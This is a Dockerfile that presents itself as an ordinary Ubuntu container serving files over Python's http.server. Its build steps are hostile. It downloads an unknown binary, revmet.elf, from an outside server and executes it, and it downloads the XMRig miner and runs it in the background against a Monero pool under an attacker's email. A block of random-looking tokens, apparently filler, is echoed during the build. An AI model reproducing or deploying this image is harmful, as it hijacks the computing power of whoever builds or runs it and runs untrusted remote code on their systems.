FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo HFzXx0AARa4pPzrZnuWCb60rX6cp7fLM zyELkSRLHUSRYXWYRanIER6dyfnyczqF j3JXKFPxTnmSqzdXbHbfZgSeCTJfvZdq 8W6ih44uxPgaDsoVK0rmSUTN1tFc96kT FXerqMWLxBFXS7dIERJKeLLpBiBzolQy mVsN6xw7owoLHHu6DLledevN4GEvIIz3 FokofSnmnyklZ7hr8PUNkcnUpCB5tEBx abb2IQcx9BIKIDKWgrLc9JaM41kvKgHV DRbKg5fMI9KiiY3l6iFMmUmkxlTmNmd4 gYGJv80ryEgnidXFKaE8ZqC36SrWmQR0 2C4J1lXZahsA4OlC6rYAuZrMHapt5d47 37DeFrmjQUoVLj5YNTnKrzUpbozra0wU 8ZvNwRk9froJOU968iI3vRdVi2PhpFNn 2Uvfemng4cLaTMSJKEqZUfvq8SaX81Hp DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]